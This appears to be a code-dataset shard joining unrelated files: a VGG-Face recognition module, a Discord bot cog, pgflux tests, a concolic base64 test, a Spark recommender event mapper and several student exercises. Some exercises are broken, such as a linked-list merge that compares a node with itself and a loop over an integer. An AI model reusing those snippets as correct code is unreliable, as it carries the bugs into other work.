VGGFace\nfrom commons import functions\n\nfrom commons import functions, distance as dst\n\n\ndef represent(img_path, model=None, enforce_detection=True, detector_backend='opencv',\n align=True, normalization='base'):\n \"\"\"\n This function represents facial images as vectors\n\n Parameters:\n img_path: exact image path, numpy array (BGR) or based64 encoded images could be passed.\n model: Built model. A face recognition model is built every call of verify function. You can pass pre-built face recognition model optionally if you will call verify function several times. Consider to pass model if you are going to call represent function in a for loop.\n model = build_model('VGG-Face')\n enforce_detection (boolean): If any face could not be detected in an image, then verify function will return exception. Set this to False not to have this exception. This might be convenient for low resolution images.\n detector_backend (string): set face detector backend as retinaface, mtcnn, opencv, ssd or dlib\n normalization (string): normalize the input image before feeding to model\n Returns:\n Represent function returns a multidimensional vector. The number of dimensions is changing based on the reference model. E.g. FaceNet returns 128 dimensional vector; VGG-Face returns 2622 dimensional vector.\n \"\"\"\n\n if model is None:\n model = build_model('VGG-Face')\n # decide input shape\n input_shape_x, input_shape_y = functions.find_input_shape(model)\n\n # detect and align\n img = functions.preprocess_face(img=img_path, target_size=(input_shape_y, input_shape_x),\n enforce_detection=enforce_detection, detector_backend=detector_backend, align=align)\n # custom normalization\n img = functions.normalize_input(img=img, normalization=normalization)\n\n # represent\n embedding = model.predict(img)[0].tolist()\n\n return embedding\n\n\ndef build_model():\n \"\"\"\n This function builds a VGG-Face model\n Returns:\n built model\n \"\"\"\n model_name = 'VGG-Face'\n global model_obj # singleton design pattern\n\n models = {\n 'VGG-Face': VGGFace.loadModel,\n }\n\n if not \"model_obj\" in globals():\n model_obj = {}\n\n if not model_name in model_obj.keys():\n model = models.get(model_name)\n if model:\n model = model()\n model_obj[model_name] = model\n else:\n raise ValueError('Invalid model_name passed - {}'.format(model_name))\n\n return model_obj[model_name]\n\n\ndef verify(img1_path, img2_path, distance_metric='cosine', model=None, enforce_detection=True,\n detector_backend='opencv', align=True, prog_bar=True, normalization='base'):\n \"\"\"\n This function verifies an image pair is same person or different persons.\n Parameters:\n img1_path, img2_path (string): exact image path, numpy array (BGR) or based64 encoded images could be passed.\n distance_metric (string): cosine, euclidean, euclidean_l2\n model (string): Built model. A face recognition model is built every call of verify function. You can pass pre-built face recognition model optionally if you will call verify function several times.\n enforce_detection (boolean): If no face could not be detected in an image, then this function will return exception by default. Set this to False not to have this exception. This might be convenient for low resolution images.\n detector_backend (string): set face detector backend as retinaface, mtcnn, opencv, ssd or dlib\n align (boolean): face alignment\n prog_bar (boolean): enable/disable a progress bar\n normalization (string): base: no normalization, ..\n Returns:\n Verify function returns a dictionary.\n \"\"\"\n tic = time.time()\n\n img_list = [[img1_path, img2_path]]\n\n resp_objects = []\n\n model_names = []\n metrics = []\n model_names.append('VGG-Face')\n metrics.append(distance_metric)\n\n # model_name = 'VGG-Face'\n # metric = distance_metric\n if model is None:\n model = build_model()\n models = {}\n models['VGG-Face'] = model\n\n disable_option = (False if len(img_list) > 1 else True) or not prog_bar\n\n pbar = tqdm(range(0, len(img_list)), desc='Verification', disable=disable_option)\n\n for index in pbar:\n instance = img_list[index]\n\n if type(instance) == list and len(instance) >= 2:\n img1_path = instance[0];\n img2_path = instance[1]\n\n custom_model = models['VGG-Face']\n img1_representation = represent(img_path=img1_path\n , model=custom_model\n , enforce_detection=enforce_detection, detector_backend=detector_backend\n , align=align\n , normalization=normalization\n )\n img2_representation = represent(img_path=img2_path\n , model=custom_model\n , enforce_detection=enforce_detection, detector_backend=detector_backend\n , align=align\n , normalization=normalization\n )\n\n # find distance between embeddings\n for j in metrics:\n if j == 'cosine':\n distance = dst.findCosineDistance(img1_representation, img2_representation)\n else:\n raise ValueError('Invalid distance_metric passed - ', distance_metric)\n\n distance = np.float64(distance)\n\n # decision\n\n threshold = dst.findThreshold('VGG-Face', j)\n\n if distance <= threshold:\n identified = True\n else:\n identified = False\n\n resp_obj = {\n \"verified\": identified,\n \"distance\": distance,\n \"threshold\": threshold,\n \"model\": 'VGG-Face',\n \"detector_backend\": detector_backend,\n \"similarity_metric\": distance_metric\n }\n return resp_obj\n\n else:\n raise ValueError(\"Invalid arguments passed to verify function: \", instance)\n\n toc = time.time()\n\n\ndef detectFace(img_path, target_size=(224, 224), detector_backend='opencv', enforce_detection=True, align=True):\n \"\"\"\n This function applies pre-processing stages of a face recognition pipeline including detection and alignment\n\n Parameters:\n img_path: exact image path, numpy array (BGR) or base64 encoded image\n\n detector_backend (string): face detection backends are retinaface, mtcnn, opencv, ssd or dlib\n\n Returns:\n detected and aligned face in numpy format\n \"\"\"\n img = functions.preprocess_face(img=img_path, target_size=target_size, detector_backend=detector_backend,\n enforce_detection=enforce_detection, align=align)[\n 0] # preprocess_face returns (1, 224, 224, 3)\n return img[:, :, ::-1] # bgr to rgb\n\n\ndef find(img_path, db_path, distance_metric='cosine', model=None, enforce_detection=True, detector_backend='opencv',\n align=True, prog_bar=True, normalization='base', silent=False):\n \"\"\"\n This function applies verification several times and find an identity in a database\n\n Parameters:\n img_path: exact image path, numpy array (BGR) or based64 encoded image. If you are going to find several identities, then you should pass img_path as array instead of calling find function in a for loop. e.g. img_path = [\"img1.jpg\", \"img2.jpg\"]\n db_path (string): You should store some .jpg files in a folder and pass the exact folder path to this.\n distance_metric (string): cosine, euclidean, euclidean_l2\n model: built deepface model. A face recognition models are built in every call of find function. You can pass pre-built models to speed the function up.\n enforce_detection (boolean): The function throws exception if a face could not be detected. Set this to True if you don't want to get exception. This might be convenient for low resolution images.\n detector_backend (string): set face detector backend as retinaface, mtcnn, opencv, ssd or dlib\n prog_bar (boolean): enable/disable a progress bar\n\n Returns:\n This function returns pandas data frame. If a list of images is passed to img_path, then it will return list of pandas data frame.\n \"\"\"\n\n tic = time.time()\n\n img_paths = [img_path]\n\n # -------------------------------\n\n if os.path.isdir(db_path) is True:\n\n if model is None:\n\n model = build_model()\n models = {}\n models['VGG-Face'] = model\n\n else: # model != None\n if not silent: print(\"Already built model is passed\")\n\n models = {}\n models['VGG-Face'] = model\n\n # ---------------------------------------\n\n model_names = [];\n metric_names = []\n model_names.append('VGG-Face')\n metric_names.append(distance_metric)\n\n # ---------------------------------------\n\n file_name = \"representations_%s.pkl\" % (\"VGG-Face\")\n file_name = file_name.replace(\"-\", \"_\").lower()\n\n if path.exists(db_path + \"/\" + file_name):\n\n if not silent: print(\"WARNING: Representations for images in \", db_path,\n \" folder were previously stored in \", file_name,\n \". If you added new instances after this file creation, then please delete this file and call find function again. It will create it again.\")\n\n f = open(db_path + '/' + file_name, 'rb')\n representations = pickle.load(f)\n\n if not silent: print(\"There are \", len(representations), \" representations found in \", file_name)\n\n else: # create representation.pkl from scratch\n employees = []\n\n for r, d, f in os.walk(db_path): # r=root, d=directories, f = files\n for file in f:\n if ('.jpg' in file.lower()) or ('.png' in file.lower()):\n exact_path = r + \"/\" + file\n employees.append(exact_path)\n\n if len(employees) == 0:\n raise ValueError(\"There is no image in \", db_path,\n \" folder! Validate .jpg or .png files exist in this path.\")\n\n # ------------------------\n # find representations for db images\n\n representations = []\n\n pbar = tqdm(range(0, len(employees)), desc='Finding representations', disable=prog_bar)\n\n # for employee in employees:\n for index in pbar:\n employee = employees[index]\n\n instance = []\n instance.append(employee)\n\n custom_model = models['VGG-Face']\n\n representation = represent(img_path=employee\n , model=custom_model\n , enforce_detection=enforce_detection, detector_backend=detector_backend\n , align=align\n , normalization=normalization\n )\n\n instance.append(representation)\n\n # -------------------------------\n\n representations.append(instance)\n\n f = open(db_path + '/' + file_name, \"wb\")\n pickle.dump(representations, f)\n f.close()\n\n if not silent: print(\"Representations stored in \", db_path, \"/\", file_name,\n \" file. Please delete this file when you add new identities in your database.\")\n\n # ----------------------------\n # now, we got representations for facial database\n\n df = pd.DataFrame(representations, columns=[\"identity\", \"%s_representation\" % ('VGG-Face')])\n\n df_base = df.copy() # df will be filtered in each img. we will restore it for the next item.\n\n resp_obj = []\n\n global_pbar = tqdm(range(0, len(img_paths)), desc='Analyzing', disable=prog_bar)\n for j in global_pbar:\n img_path = img_paths[j]\n\n # find representation for passed image\n\n custom_model = models['VGG-Face']\n\n target_representation = represent(img_path=img_path\n , model=custom_model\n , enforce_detection=enforce_detection,\n detector_backend=detector_backend\n , align=align\n , normalization=normalization\n )\n\n for k in metric_names:\n distances = []\n for index, instance in df.iterrows():\n source_representation = instance[\"%s_representation\" % ('VGG-Face')]\n\n if k == 'cosine':\n distance = dst.findCosineDistance(source_representation, target_representation)\n elif k == 'euclidean':\n distance = dst.findEuclideanDistance(source_representation, target_representation)\n elif k == 'euclidean_l2':\n distance = dst.findEuclideanDistance(dst.l2_normalize(source_representation),\n dst.l2_normalize(target_representation))\n\n distances.append(distance)\n\n # ---------------------------\n\n df[\"%s_%s\" % ('VGG-Face', k)] = distances\n\n threshold = dst.findThreshold('VGG-Face', k)\n df = df.drop(columns=[\"%s_representation\" % ('VGG-Face')])\n df = df[df[\"%s_%s\" % ('VGG-Face', k)] <= threshold]\n\n df = df.sort_values(by=[\"%s_%s\" % ('VGG-Face', k)], ascending=True).reset_index(drop=True)\n\n resp_obj.append(df)\n df = df_base.copy() # restore df for the next iteration\n\n # ----------------------------------\n\n toc = time.time()\n\n if not silent: print(\"find function lasts \", toc - tic, \" seconds\")\n\n if len(resp_obj) == 1:\n return resp_obj[0]\n\n return resp_obj\n\n else:\n raise ValueError(\"Passed db_path does not exist!\")\n\n return None\n","repo_name":"alaeddinehamroun/face_recognition","sub_path":"facerecognition.py","file_name":"facerecognition.py","file_ext":"py","file_size_in_byte":14894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2810314848","text":"import discord\r\nfrom discord.ext import commands,tasks\r\nimport random\r\nimport requests\r\nimport json\r\nimport asyncio\r\nimport itertools\r\n\r\n\r\nclass Server(commands.Cog):\r\n def __init__(self,bot):\r\n self.bot=bot\r\n\r\n @commands.command()\r\n async def mention(self,ctx, user : discord.Member):\r\n await ctx.send(user.mention)\r\n\r\n @commands.command(aliases=[\"info\",\"details\"])\r\n async def whois(self,ctx, member : discord.Member = None):\r\n if not member:\r\n member = ctx.author\r\n embed=discord.Embed(title=member.name,description=member.mention,color=discord.Colour.red())\r\n embed.add_field(name=\"ID\",value=member.id,inline=False)\r\n embed.set_thumbnail(url=member.avatar_url)\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command(aliases=[\"getprofilepic\",\"dp\"])\r\n async def getdp(self,ctx, member: discord.Member = None):\r\n if not member:\r\n member = ctx.author\r\n await ctx.send(member.avatar_url)\r\n\r\n @commands.command(aliases=[\"dm\",\"pvtmessage\"])\r\n async def pm(self,ctx , member: discord.Member = None,*,text):\r\n if not member:\r\n member = ctx.author\r\n await member.send(text)\r\n\r\n @commands.command(aliases=[\"clean\"])\r\n @commands.has_permissions(manage_messages=True)\r\n async def clear(self,ctx,amount=1):\r\n await ctx.channel.purge(limit=amount+1)\r\n\r\n @commands.command()\r\n @commands.has_permissions(administrator=True)\r\n async def spam(self,ctx, times,*,text):\r\n if int(times)>20:\r\n times=20\r\n await ctx.send(ctx.author.mention+\" sorry but spam command is limited to 20\")\r\n for i in range(int(times)):\r\n await ctx.send(text)\r\n\r\n @commands.command()\r\n async def ping(self,ctx):\r\n await ctx.send(f'Pong! {round(self.bot.latency *1000)}ms')\r\n \r\n @commands.command()\r\n async def server(self,ctx):\r\n name=str(ctx.guild.name)\r\n description=str(ctx.guild.description)\r\n owner=str(ctx.guild.owner)\r\n _id = str(ctx.guild.id)\r\n region=str(ctx.guild.region)\r\n memcount=str(ctx.guild.member_count)\r\n icon = str(ctx.guild.icon_url)\r\n\r\n embed=discord.Embed(\r\n title=name +\" Server Information\",\r\n description=description,\r\n color=discord.Color.blue()\r\n )\r\n embed.set_thumbnail(url=icon)\r\n embed.add_field(name=\"Owner\",value=owner,inline=True)\r\n embed.add_field(name=\"Server Id\",value=_id,inline=True)\r\n embed.add_field(name=\"Region\",value=region,inline=True)\r\n embed.add_field(name=\"Member Count\",value=memcount,inline=True)\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command()\r\n @commands.has_permissions(administrator=True)\r\n async def newrole(self,ctx, *, rolename=None):\r\n if not rolename:\r\n await ctx.send(\"You forgot to provide a name!\")\r\n else:\r\n role = await ctx.guild.create_role(name=rolename, mentionable=True)\r\n await ctx.author.add_roles(role)\r\n await ctx.send(f\"Successfully created and assigned {role.mention}!\")\r\n\r\n\r\n ##DONOT USE THIS THEN ANYBODY IN SERVER CAN ASSIGN HIMSELF TO ANYROLE\r\n ##@commands.command()\r\n ##async def takerole(self,ctx,*,rolename=None):\r\n ## if not rolename:\r\n ## await ctx.send(\"You forgot to provide a name!\")\r\n ## else:\r\n ## role = discord.utils.get(ctx.author.guild.roles,name=rolename)\r\n ## await ctx.author.add_roles(role)\r\n ## await ctx.send(f\"Successfully assigned {ctx.author.mention} to {rolename}!\")\r\n\r\n @commands.command()\r\n @commands.has_permissions(administrator=True)\r\n async def giverole(self,ctx,member : discord.Member = None,*,rolename=None):\r\n if not member:\r\n member = ctx.author\r\n if not rolename:\r\n await ctx.send(\"You forgot to provide a name of role!\")\r\n else:\r\n role = discord.utils.get(member.guild.roles,name=rolename)\r\n await member.add_roles(role)\r\n await ctx.send(f\"Successfully assigned {member.mention} to {rolename}!\")\r\n\r\ndef setup(bot):\r\n bot.add_cog(Server(bot))\r\n","repo_name":"Mastermind-sap/joker","sub_path":"cogs/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"9939678248","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n def insert(self, data):\r\n new_node = Node(data)\r\n if not self.head:\r\n self.head = new_node\r\n else:\r\n current = self.head\r\n while current.next:\r\n current = current.next\r\n current.next = new_node\r\n def merge(list1, list2):\r\n merged_list = LinkedList()\r\n current1 = list1.head\r\n current2 = list2.head\r\n while current1 and current2:\r\n if current2.data < current2.data:\r\n merged_list.insert(current1.data)\r\n current1 = current1.next\r\n else:\r\n merged_list.insert(current1.data)\r\n current2 = current2.next\r\n while current1:\r\n merged_list.insert(current1.data)\r\n current1 = current1.next\r\n while current2:\r\n merged_list.insert(current2.data)\r\n current2 = current2.next\r\n return merged_list\r\n def sort(self):\r\n if not self.head or not self.head.next:\r\n return\r\n current = self.head\r\n while current:\r\n index =current.next\r\n while index:\r\n if current.data > index.data:\r\n current.data, index.data = index.data, current.data\r\n index = index.next\r\n current = current.next\r\n\r\n def display(self):\r\n current = self.head\r\n while current:\r\n print(current.data, end=\"->\")\r\n current = current.next\r\n print(\"null\")\r\n\r\n\r\nlist1 = LinkedList()\r\nlist1.insert(25)\r\nlist1.insert(35)\r\nlist1.insert(12)\r\nlist1.insert(4)\r\nlist1.insert(36)\r\nlist1.insert(48)\r\n\r\nlist2 = LinkedList()\r\nlist2.insert(8)\r\nlist2.insert(32)\r\nlist2.insert(22)\r\nlist2.insert(45)\r\nlist2.insert(63)\r\nlist2.insert(49)\r\n\r\nprint(\"Linked-List-1:\")\r\nlist1.display()\r\nprint(\"Linked-List-2:\")\r\nlist2.display()\r\n\r\nmerged_list = LinkedList.merge(list1, list2)\r\nmerged_list.sort()\r\n\r\n","repo_name":"marepallik/javahackerrankassign","sub_path":"merge n sort.py","file_name":"merge n sort.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27616391853","text":"# -*- coding:utf-8 -*-\n__author__ = 'ShawDa'\n\n\nclass Solution:\n def IsContinuous(self, numbers):\n # write code here\n # 数组长度为5,除0外其它数个数不超过1,除0外其它数相差小于等于4\n if len(numbers) != 5:\n return False\n num_dict, min_num, max_num = {}, 14, -1\n for num in numbers:\n if num == 0:\n continue\n if num in num_dict:\n return False\n else:\n num_dict[num] = 1\n if num > max_num:\n max_num = num\n if num < min_num:\n min_num = num\n if max_num - min_num <= 4:\n return True\n else:\n return False\n","repo_name":"ShawDa/Coding","sub_path":"coding-interviews/45扑克牌顺子.py","file_name":"45扑克牌顺子.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7640653605","text":"from typing import Tuple\nfrom unittest.mock import Mock, patch\n\nimport pytest\nfrom psycopg2.extensions import connection as Connection\n\nimport pgflux.core as core\nimport pgflux.output.http as http\nfrom pgflux.enums import Precision\nfrom pgflux.exc import PgFluxException\nfrom pgflux.output import HTTPSOutput, Output\n\n\n@pytest.fixture\ndef mock_http_connection() -> Tuple[Mock, http.HTTPOutput]:\n def fake_getenv(key: str, fallback: str) -> str:\n test_data = {\n \"PGFLUX_INFLUX_HOST\": \"fake-host\",\n \"PGFLUX_INFLUX_USERNAME\": \"fake-username\",\n \"PGFLUX_INFLUX_PASSWORD\": \"fake-password\",\n \"PGFLUX_INFLUX_DBNAME\": \"fake-db-name\",\n }\n return test_data.get(key, fallback)\n\n with patch(\"pgflux.output.http.getenv\") as getenv:\n getenv.side_effect = fake_getenv\n instance = http.HTTPOutput()\n instance.CONNECTION_CLASS = Mock() # type: ignore\n fake_connection = Mock(name=\"fake-connection\")\n instance.CONNECTION_CLASS.return_value = fake_connection\n yield fake_connection, instance # type: ignore\n\n\ndef test_http_output():\n mock_output = Mock()\n mock_output.PRECISION = Precision.SECONDS\n with core.connect() as db_connection:\n db_connection: Connection\n core.execute_query(\n db_connection, \"cluster:connections\", [], mock_output\n )\n mock_output.send.assert_called() # type: ignore\n\n\ndef test_factory():\n instance = Output.create(\"https\")\n assert isinstance(instance, HTTPSOutput)\n\n\ndef test_http_send_to_influx():\n mock_connection = Mock()\n mock_response = Mock(status=204)\n mock_connection.getresponse.return_value = mock_response # type: ignore\n response = http.send_to_influx(\n mock_connection, {\"Foo\": \"Bar\"}, {\"frob\": \"nix\"}, \"the-payload\"\n )\n mock_connection.request.assert_called_with( # type: ignore\n \"POST\", \"/write?frob=nix\", \"the-payload\", {\"Foo\": \"Bar\"}\n )\n assert response is mock_response\n\n\ndef test_http_send_to_influx_error():\n mock_connection = Mock()\n mock_response = Mock(status=500)\n mock_connection.getresponse.return_value = mock_response # type: ignore\n with pytest.raises(PgFluxException):\n http.send_to_influx(\n mock_connection, {\"Foo\": \"Bar\"}, {\"frob\": \"nix\"}, \"the-payload\"\n )\n\n\ndef test_http_connect(mock_http_connection: Tuple[Mock, http.HTTPOutput]):\n\n fake_connection, http_output = mock_http_connection\n\n with http_output.connect() as connection:\n conn, headers, params = connection\n assert conn is fake_connection\n assert headers == {\n \"Content-Type\": \"text/plain\",\n \"Authorization\": \"BASIC ZmFrZS11c2VybmFtZTpmYWtlLXBhc3N3b3Jk\",\n }\n assert params == {\n \"db\": \"fake-db-name\",\n \"precision\": \"s\",\n }\n fake_connection.close.assert_called() # type: ignore\n\n\ndef test_http_send_flush(mock_http_connection: Tuple[Mock, http.HTTPOutput]):\n\n fake_connection, http_output = mock_http_connection\n fake_connection.getresponse.return_value = Mock(status=204) # type: ignore\n http_output.send(\"hello-world\")\n http_output.send(\"hello-world2\")\n http_output.flush()\n fake_connection.request.assert_called_with( # type: ignore\n \"POST\",\n \"/write?db=fake-db-name&precision=s\",\n \"hello-world\\nhello-world2\",\n {\n \"Content-Type\": \"text/plain\",\n \"Authorization\": \"BASIC ZmFrZS11c2VybmFtZTpmYWtlLXBhc3N3b3Jk\",\n },\n )\n","repo_name":"post-luxembourg/pgflux","sub_path":"tests/test_outputs.py","file_name":"test_outputs.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21979642212","text":"\n# def is_leap(year):\n# a = year%4\n# b = year%100\n# c = year%400\n# print(a)\n# if a==0:\n# if b==0 : \n# if c!=0: return False\n# else: return True \n \n# else: return True\n# else:\n# return False\n\n\n# year=int(input())\n# print(is_leap(year))\n\n\n\n'''\nfor i in range(5):\n print(i)\n \n'''\n\n\n\n# def func(n):\n# i=1\n# while i <= n :\n# print (i)\n# i = i+1\n \n\n# n = 5\n# l1=(func(n))\n# print(l1)\n#\n\n\n\n\ndef fuc(n):\n n = 5\n i = 1\n for i in n :\n print(i)\n i = i+1\n \nn = 5\nprint(fuc(n))","repo_name":"Anurag127001/CWH_Python","sub_path":"Hacker rank practice sets/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35456361982","text":"import random\n\nroll = 0\ncount = 0\n\nprint('First person to roll a 5 wins!')\n\nwhile roll != 5:\n\n name = input('Enter a name, or \\'q\\' to quit: ' )\n if name.strip() == '':\n continue #skip to top\n\n if name.strip() == 'q':\n break #ends the loop\n\n count = count + 1\n roll = random.randint(1, 5)\n print(f'{name} rolled {roll}')\nelse: #runs when while is false\n print(f'{name} Wins!!!')\n\nprint(f'You rolled the dice {count} times.')","repo_name":"kattagarian/learning","sub_path":"python-beginner-ms/python-while/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3698690131","text":"#!/usr/bin/env python3\n\nfrom concolic import *\n\n## THIS IMPLEMENTATION OF `byte_encode` DOES NOT WORK!\n## We will lose the symbolic part of concolic values.\n##\n## BYTES = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\n##\n## def byte_encode(x):\n## return ord(BYTES[x])\n\ndef byte_encode(x):\n if x < 26:\n return x + ord('A')\n elif x < 52:\n return x - 26 + ord('a')\n elif x < 62:\n return x - 52 + ord('0')\n elif x < 63:\n return ord('+')\n elif x < 64:\n return ord('/')\n raise Exception(\"Never be here\")\n\ndef base64_encode(data):\n length = len(data)\n output = [ord('=')] * ((length + 2) // 3 * 4)\n ptr, i = 0, 0\n\n while len(data) >= 3:\n first, second, third = data[:3]\n data = data[3:]\n\n n = first << 16 | second << 8 | third\n output[ptr], ptr = byte_encode((n >> 18) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 12) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 6) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 0) & 63), ptr + 1\n\n if len(data) == 1:\n n = data[0] << 16\n output[ptr], ptr = byte_encode((n >> 18) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 12) & 63), ptr + 1\n elif len(data) == 2:\n n = data[0] << 16 | data[1] << 8\n output[ptr], ptr = byte_encode((n >> 18) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 12) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 6) & 63), ptr + 1\n\n return output\n\ndef test_me():\n data = [mk_int(chr(i + ord('a'))) for i in range(6)]\n\n ## assume all input characters are visible.\n def assume_ok(data):\n for x in data:\n if x < 0x20 or x > 0x7e:\n return False\n return True\n\n def bytes_equal(xs, ys):\n if len(xs) != len(ys):\n return False\n for x, y in zip(xs, ys):\n if x != ord(y):\n return False\n return True\n\n if assume_ok(data):\n if bytes_equal(base64_encode(data), \"aDFiYWJ5\"):\n ## 679 rounds of iteration to trigger this assertion.\n ## [679] a = 0x68, b = 0x31, c = 0x62, d = 0x61, e = 0x62, f = 0x79\n assert False, \"reach me\"\n\n## heuristic to prioritize the path leads to `assert False`.\n##\n## this heuristic is based on some observations from the code. To expose\n## `assert False`, we need to pass all checks in bytes_equal, so we give\n## path with equality a positive score, while inequality a high negative\n## score.\ndef eval_pc(pc):\n goodness = 0\n for i in pc:\n assert isinstance(i, ast_eq)\n i, v = i.a, i.b\n if isinstance(i, ast_eq):\n if v.b:\n goodness += 100\n else:\n goodness -= 1000\n else:\n goodness -= 1\n return goodness\n\nif __name__ == \"__main__\":\n concolic(test_me, eval_pc=eval_pc)\n","repo_name":"foreverbell/mini-symex","sub_path":"src/test_base64.py","file_name":"test_base64.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"74106607272","text":"# Name: - nest_event_mapping_replace\n# Input:- events weight mapping using replace function\n# Description: - Function to apply event weights mapping\n# calling :- df=nest_event_mapping_replace(\"df\")\n\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.sql.functions import col\n\nfrom nest_recom_default_weights import (\n\tEVENTS_WEIGHT, \n\tDEFAULT_WEIGHT\n\t)\n\ndef map_weights(data,sc,sqlContext):\n \n data.registerTempTable(\"table\")\n\n df=sqlContext.sql(\"select userId,\" \n \t\t\t\t\t\t+ \" substr(context.page.path,11,length(context.page.path)) as propertyId,\"\n \t\t\t\t\t\t+ \" event as weight\" \n\t\t\t\t\t\t\t+ \" from table\"\n\t\t\t\t\t\t\t+ \" where userId is not null\"\n\t\t\t\t\t\t\t+ \" and event in\" \n\t\t\t\t\t\t\t+ \" (\"\n\t\t\t\t\t\t\t+ \" 'ScheduleVisit',\"\n\t\t\t\t\t\t\t+ \" 'Unfavorited',\"\n\t\t\t\t\t\t\t+ \" 'PhotoClicked',\"\n\t\t\t\t\t\t\t+ \" 'CalculateClicked',\"\n\t\t\t\t\t\t\t+ \" 'MortgageCalculatorCTAClicked',\"\n\t\t\t\t\t\t\t+ \" 'ContactPartnerClicked',\"\n\t\t\t\t\t\t\t+ \" 'RequestInformationClicked',\"\n\t\t\t\t\t\t\t+ \" 'SimilarPropertyClicked',\"\n\t\t\t\t\t\t\t+ \" 'PartnerBanner',\"\n\t\t\t\t\t\t\t+ \" 'MapPinClicked',\"\n\t\t\t\t\t\t\t+ \" 'CallClicked',\"\n\t\t\t\t\t\t\t+ \" 'Prop-page-email',\"\n\t\t\t\t\t\t\t+ \" 'ChatClicked',\"\n\t\t\t\t\t\t\t+ \" 'AgentCall',\"\n\t\t\t\t\t\t\t+ \" 'AgentEmail',\"\n\t\t\t\t\t\t\t+ \" 'ComponentTriggered'\"\n\t\t\t\t\t\t\t+ \" )\" \n\t\t\t\t\t\t\t+ \" order by userId\")\n \t\n # file_name=\"UserEvents/events_mapping.json\"\n # events_mapping=sqlContext.read.json(file_name)\n # events=sc.textfile(events.txt)\n\n \n\n # give weights to each event\n df2 = df.replace(to_replace=EVENTS_WEIGHT, subset=['weight'])\n \n\n # weighted average\n df3 = df2.groupBy(\"userId\",\"propertyId\") \\\n \t\t .agg({'weight':'avg'}) \\\n \t\t .withColumnRenamed('avg(weight)', 'weight') \\\n \t\t .fillna({'weight':DEFAULT_WEIGHT})\n\n \n # fill null with default weight\n #df5 = df4.fillna({'weight':DEFAULT_WEIGHT})\n #df6 = df5.na.drop()\n \n \n\n return df3\n\ndef numeric_conversion(data):\n indexers = [StringIndexer(inputCol=column, outputCol=\"new_\"+column).fit(data) for column in list(set(data.columns)-set(['weight'])) ]\n pipeline = Pipeline(stages=indexers)\n df_r = pipeline.fit(data).transform(data)\n \n df_r = df_r.withColumn(\"new_userId\", col(\"new_userId\").cast(\"int\"))\n df_r = df_r.withColumn(\"new_propertyId\", col(\"new_propertyId\").cast(\"int\"))\n df_r = df_r.withColumn(\"weight\", col(\"weight\").cast(\"int\"))\n \n \n ## TBD\n df_r = df_r.filter(df_r[\"new_propertyId\"]!=0)\n \n \n return df_r\n \n '''\n stringIndexer = StringIndexer(inputCol=\"userId\", outputCol=\"new_userId\")\n model = stringIndexer.fit(sql_data)\n df_spark_index = model.transform(sql_data).withColumn(\"new_userId\", col(\"new_userId\").cast(\"int\"))\n df_spark_index.show()\n \n # Convert into numerical IDs\n data['new_userId'] = data['userId'].astype(\"category\").cat.codes\n data['new_propertyId'] = data['propertyId'].astype(\"category\").cat.codes\n\n # Create a lookup frame so we can get the propertyId names back in \n # readable form later.\n item_lookup = data[['new_propertyId', 'propertyId']].drop_duplicates()\n item_lookup['new_propertyId'] = item_lookup.new_propertyId.astype(str)\n\n data = data.drop(['user', 'propertyId'], axis=1)\n\n # Drop any rows that have 0 weight\n data = data.loc[data.weight != 0]\n\n # Create lists of all users, properties and weights\n users = list(np.sort(data.new_userId.unique()))\n artists = list(np.sort(data.new_propertyId.unique()))\n weight = list(data.weight)\n\n # Get the rows and columns for our new matrix\n rows = data.new_userId.astype(int)\n cols = data.new_propertyId.astype(int)\n\n '''\n \n\n","repo_name":"jmalhot/Collaborative-Filtering-ALS","sub_path":"nest_recom_event_mapper.py","file_name":"nest_recom_event_mapper.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12658810946","text":"# old version = 8.12\nimport cv2\nfrom tracker import KCFTracker\n\nenv = 'MAC'\ntest = 'BenchMark' # 'Cam'\n\nif env == 'MAC':\n\ttest_seq = '/Users/apple/Downloads/cnnKCF_proj_code/KCF_8.12/Sequence/Boy/'\nelif env == 'WIN':\n\ttest_seq = 'Sequence\\\\Boy\\\\'\n\n# get IoU of track_bbox and truth_bbox\ndef IoU(box1, box2): # 2D bounding box [top, left, bottom, right]\n\tin_h = min(box1[2], box2[2]) - max(box1[0], box2[0])\n\tin_w = min(box1[3], box2[3]) - max(box1[1], box2[1])\n\tinter = 0 if in_h<0 or in_w<0 else in_h*in_w\n\tunion = (box1[2] - box1[0]) * (box1[3] - box1[1]) + (box2[2] - box2[0]) * (box2[3] - box2[1])\n\tunion -= inter\n\tiou = inter / union\n\treturn iou\n\n# read groundtruth_rect.txt from seq_file to get bbox\ndef 